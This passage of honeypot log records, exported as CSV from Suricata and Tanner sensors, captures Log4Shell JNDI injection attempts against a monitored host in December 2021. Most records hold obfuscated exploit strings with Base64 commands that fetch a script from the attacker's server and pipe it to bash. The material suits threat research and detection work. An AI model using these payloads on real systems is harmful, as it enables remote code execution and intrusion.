text"",""gaps"":false,""state"":""CLOSED"",""md5"":""ac56291293ec6186a86afc3495db6b7f"",""stored"":false,""size"":9652,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,distincthose,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:46:34.089665+0000",,,,,,,,,Suricata,,,,
"2021-12-14T21:46:34.089Z",1,Q3Dpun0B6VkG8jKzaR6V,"logstash-suricata-2021.12.14",,"_doc","893e61f7-ca52-48aa-ba33-de3b20163097",302cffd6ad72,"eebbfeb4-2928-48e1-93d8-adc0254d0f71",302cffd6ad72,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1498069841072128,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,302cffd6ad72,gzip,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjE3Mi4xNTEuMTIxOjgwKXxiYXNo}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjE3Mi4xNTEuMTIxOjgwKXxiYXNo}",9652,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjE3Mi4xNTEuMTIxOjgwKXxiYXNo}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",59975318,,"{""timestamp"":""2021-12-14T21:46:34.089665+0000"",""flow_id"":1498069841072128,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":51566,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjE3Mi4xNTEuMTIxOjgwKXxiYXNo}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjE3Mi4xNTEuMTIxOjgwKXxiYXNo}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjE3Mi4xNTEuMTIxOjgwKXxiYXNo}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":9652}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",51566,,,,,,,,,,,,distincthose,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:46:34.089665+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:46:33.952Z",1,UHDpun0B6VkG8jKzbR6E,"logstash-tanner-2021.12.14",,"_doc","893e61f7-ca52-48aa-ba33-de3b20163097",302cffd6ad72,"eebbfeb4-2928-48e1-93d8-adc0254d0f71",302cffd6ad72,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,gzip,,,close,,,"172.16.0.42:80","${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjE3Mi4xNTEuMTIxOjgwKXxiYXNo}","${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjE3Mi4xNTEuMTIxOjgwKXxiYXNo}",,302cffd6ad72,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",85485,,"{""method"": ""GET"", ""path"": ""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjE3Mi4xNTEuMTIxOjgwKXxiYXNo}"", ""headers"": {""host"": ""172.16.0.42:80"", ""user-agent"": ""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjE3Mi4xNTEuMTIxOjgwKXxiYXNo}"", ""referer"": ""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjE3Mi4xNTEuMTIxOjgwKXxiYXNo}"", ""accept-encoding"": ""gzip"", ""connection"": ""close""}, ""uuid"": ""3bf018f5-e9b4-4d1b-a2b0-1710e8d37699"", ""peer"": {""ip"": ""195.54.160.149"", ""port"": 51566}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""ba5b256d-b0ec-4605-b8c3-12159a95b45e""}}}, ""timestamp"": ""2021-12-14T21:46:33.952389""}",,,,,,GET,,,,,,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjE3Mi4xNTEuMTIxOjgwKXxiYXNo}",,,,,,,,,,,index,1,1,"0.6.0","ba5b256d-b0ec-4605-b8c3-12159a95b45e","0.6.0",,,,,,,,,,,,,,,,,,"195.54.160.149",51566,,,,,,,,,200,,,distincthose,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:46:33.952389",,,,,,,,,Tanner,,,"3bf018f5-e9b4-4d1b-a2b0-1710e8d37699",
"2021-12-14T21:43:32.240Z",1,aw3mun0B5e7x5EYnskcc,"logstash-suricata-2021.12.14",,"_doc","a1b16e93-b602-4efc-bdc1-c18d0fa28474",fb3aba9b7676,"608b10a3-9277-4160-b2b2-0f0968f755ef",fb3aba9b7676,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8080,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,299516255491302,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,fb3aba9b7676,gzip,,,,"172.16.0.42",,GET,8080,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuOTkuNjcuMjE5OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3Ljk5LjY3LjIxOTo4MDgwKXxiYXNo}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuOTkuNjcuMjE5OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3Ljk5LjY3LjIxOTo4MDgwKXxiYXNo}",0,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuOTkuNjcuMjE5OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3Ljk5LjY3LjIxOTo4MDgwKXxiYXNo}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",45971477,,"{""timestamp"":""2021-12-14T21:43:32.240421+0000"",""flow_id"":299516255491302,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":46976,""dest_ip"":""172.16.0.42"",""dest_port"":8080,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8080,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuOTkuNjcuMjE5OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3Ljk5LjY3LjIxOTo4MDgwKXxiYXNo}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuOTkuNjcuMjE5OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3Ljk5LjY3LjIxOTo4MDgwKXxiYXNo}"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuOTkuNjcuMjE5OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3Ljk5LjY3LjIxOTo4MDgwKXxiYXNo}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",46976,,,,,,,,,,,,fortunateworkhorse,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:43:32.240421+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:43:04.884Z",1,mqHmun0BCXMCNTQLLay4,"logstash-suricata-2021.12.14",,"_doc","40f4cca2-6a88-46a1-8d26-0cd1f057c1b3",7487514c50d4,"58d152f8-70d1-4196-bc50-a58b65fffbd8",7487514c50d4,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8080,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,374682476362550,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,7487514c50d4,gzip,,,,"172.16.0.42",,GET,8080,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuNTguNjg6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuNTguNjg6ODA4MCl8YmFzaA==}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuNTguNjg6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuNTguNjg6ODA4MCl8YmFzaA==}",0,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuNTguNjg6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuNTguNjg6ODA4MCl8YmFzaA==}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",44974279,,"{""timestamp"":""2021-12-14T21:43:04.884275+0000"",""flow_id"":374682476362550,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":54978,""dest_ip"":""172.16.0.42"",""dest_port"":8080,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8080,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuNTguNjg6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuNTguNjg6ODA4MCl8YmFzaA==}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuNTguNjg6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuNTguNjg6ODA4MCl8YmFzaA==}"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuNTguNjg6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuNTguNjg6ODA4MCl8YmFzaA==}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",54978,,,,,,,,,,,,burninglife,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:43:04.884275+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:42:42.075Z",1,GHDlun0B6VkG8jKz0gsf,"logstash-suricata-2021.12.14",,"_doc","c8a6898c-c716-4966-b06f-0799b02341d7",0904702013f4,"ec99acd7-15af-4929-87b4-41fd71ab7803",0904702013f4,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8080,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2004407815315097,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0904702013f4,gzip,,,,"172.16.0.42",,GET,8080,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODguMTY2LjExMC43NTo4MDgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE4OC4xNjYuMTEwLjc1OjgwODApfGJhc2g=}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODguMTY2LjExMC43NTo4MDgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE4OC4xNjYuMTEwLjc1OjgwODApfGJhc2g=}",0,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODguMTY2LjExMC43NTo4MDgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE4OC4xNjYuMTEwLjc1OjgwODApfGJhc2g=}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",45543982,,"{""timestamp"":""2021-12-14T21:42:42.075203+0000"",""flow_id"":2004407815315097,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":37614,""dest_ip"":""172.16.0.42"",""dest_port"":8080,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8080,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODguMTY2LjExMC43NTo4MDgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE4OC4xNjYuMTEwLjc1OjgwODApfGJhc2g=}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODguMTY2LjExMC43NTo4MDgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE4OC4xNjYuMTEwLjc1OjgwODApfGJhc2g=}"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODguMTY2LjExMC43NTo4MDgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE4OC4xNjYuMTEwLjc1OjgwODApfGJhc2g=}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",37614,,,,,,,,,,,,pastikebana,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:42:42.075203+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:42:39.251Z",1,NqHlun0BCXMCNTQL5qu5,"logstash-suricata-2021.12.14",,"_doc","972cc953-234c-40e5-a006-29b1f39630b0",e795ca8480e2,"32f1f21e-3f41-4fc7-b8a4-67c89db57c5e",e795ca8480e2,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2213390186321789,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e795ca8480e2,gzip,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjEyOC4yMjQuMTUzOjgwKXxiYXNo}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjEyOC4yMjQuMTUzOjgwKXxiYXNo}",7554,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjEyOC4yMjQuMTUzOjgwKXxiYXNo}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",38731196,,"{""timestamp"":""2021-12-14T21:42:39.251872+0000"",""flow_id"":2213390186321789,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":55576,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjEyOC4yMjQuMTUzOjgwKXxiYXNo}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjEyOC4yMjQuMTUzOjgwKXxiYXNo}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjEyOC4yMjQuMTUzOjgwKXxiYXNo}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7554}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",55576,,,,,,,,,,,,giantmole,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:42:39.251872+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:42:39.251Z",1,pXDlun0B6VkG8jKz5gu5,"logstash-suricata-2021.12.14",,"_doc","972cc953-234c-40e5-a006-29b1f39630b0",e795ca8480e2,"32f1f21e-3f41-4fc7-b8a4-67c89db57c5e",e795ca8480e2,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"195.54.160.149",55576,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text, with very long lines (399)",22b7d884d99be8e15fc3b1b27008c681,"[]",7554,CLOSED,false,0,,,,,,,2213390186321789,Forthnet,1241,Toronto,NA,CA,CA,Canada,,"172.16.0.42","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,e795ca8480e2,,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjEyOC4yMjQuMTUzOjgwKXxiYXNo}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjEyOC4yMjQuMTUzOjgwKXxiYXNo}",7554,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjEyOC4yMjQuMTUzOjgwKXxiYXNo}",,,,,eth0,log,"known attacker",,,,,,,"/data/suricata/log/eve.json",38732323,,"{""timestamp"":""2021-12-14T21:42:39.251872+0000"",""flow_id"":2213390186321789,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""195.54.160.149"",""dest_port"":55576,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjEyOC4yMjQuMTUzOjgwKXxiYXNo}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjEyOC4yMjQuMTUzOjgwKXxiYXNo}"",""http_content_type"":""text/html"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjEyOC4yMjQuMTUzOjgwKXxiYXNo}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7554},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text, with very long lines (399)"",""gaps"":false,""state"":""CLOSED"",""md5"":""22b7d884d99be8e15fc3b1b27008c681"",""stored"":false,""size"":7554,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,giantmole,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T21:42:39.251872+0000",,,,,,,,,Suricata,,,,
"2021-12-14T21:42:39.063Z",1,paHlun0BCXMCNTQLz6qV,"logstash-tanner-2021.12.14",,"_doc","972cc953-234c-40e5-a006-29b1f39630b0",e795ca8480e2,"32f1f21e-3f41-4fc7-b8a4-67c89db57c5e",e795ca8480e2,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,gzip,,,close,,,"172.16.0.42:80","${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjEyOC4yMjQuMTUzOjgwKXxiYXNo}","${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjEyOC4yMjQuMTUzOjgwKXxiYXNo}",,e795ca8480e2,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",62633,,"{""method"": ""GET"", ""path"": 